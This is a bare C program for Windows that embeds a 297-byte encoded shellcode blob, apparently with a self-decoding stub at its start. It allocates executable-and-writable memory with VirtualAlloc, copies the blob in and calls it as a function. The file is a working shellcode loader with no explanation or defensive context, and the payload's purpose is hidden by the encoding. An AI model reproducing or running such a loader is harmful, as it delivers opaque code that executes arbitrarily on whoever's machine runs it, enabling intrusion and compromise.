#include <windows.h>
#include <winternl.h>

typedef VOID(*SCFUNC)(VOID);

#define SCSZ 297

char shellcode[] = "\x60\xeb\x29\x5e\x56\x89\xf7\x31\xc9\xb1\x10\x8a\x06\x3c\xff\x74\x16\x46\x8a\x16\x80\xfa\xff\x74\x0e\xc0\xca\x2b\x30\xc2\x88\x17\x46\x47\x49\x74\xe4\xeb\xeb\x58\xff\xd0\x61\xc3\xe8\xd2\xff\xff\xff\x3c\xae\x05\xe1\xe1\xe1\xbd\x83\xc0\xc1\x68\xe7\x68\x77\xb5\x69\xc5\x82\x82\xb7\x4c\x10\x42\x15\x1a\x12\xcc\x1c\x92\x1e\x4b\x7b\x02\x34\x39\xc9\xea\xc4\x48\xc9\xc9\xc9\x95\xcb\xa9\x95\xcb\x69\x95\xc9\x95\x37\xb9\xe5\xbb\x39\xa7\x13\xf5\x96\xa5\xde\xd9\x03\x0b\x23\xe5\x53\x94\xe4\xf8\xbe\x45\xac\x62\xf8\xa6\x67\xac\x62\xf8\xe6\x85\xac\x6a\x59\x86\xa0\x2d\x96\x88\xcb\xc2\x04\x86\xa0\x0d\x96\x88\x2a\xc2\x04\x55\xe6\xc0\x0d\xf6\x29\x0a\x23\x55\xf6\x80\x6d\xf6\x8a\x6f\xa2\x6c\x92\x16\xd3\xe8\x6b\x6b\x6b\xc8\xfe\xf4\x5d\xd2\x37\xdc\xae\x5d\x2b\x08\xd3\x77\xc9\x46\x1f\xc8\x1c\xea\xa7\x1c\x2a\xe7\xc9\x46\x73\x1c\x86\x14\xe7\x68\x14\x38\x3c\xf2\xee\xc6\xce\x28\x12\x54\xde\x22\x74\x09\x48\x4b\x0f\x9b\xb7\xb7\xb7\x64\x4e\xeb\x80\x04\x56\x0b\x5e\xf8\x1b\x56\xea\x42\x9f\x33\x27\x27\x27\xf4\xde\x7b\x98\x51\x96\xd2\x52\xc7\x61\x1e\xc1\xb8\x35\x20\x79\x81\xc1\xc1\xc1\x25\xef\xdc\x85\x75\x13\xeb\xbb\xe3\x23\x03\x7a\x03\x53\x03\x3b\xb3\xf3\x01\x09\x7a\x83\xba\xde\xb6\xce\xa4\xfe\x16\xfe\xd5\xff";


main(void)
{
	SCFUNC runSc;
	PVOID scExe;

	scExe = VirtualAlloc(NULL, SCSZ, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(scExe, shellcode, SCSZ);

	runSc = (VOID(*)(VOID))scExe;
	runSc();
	return;
}

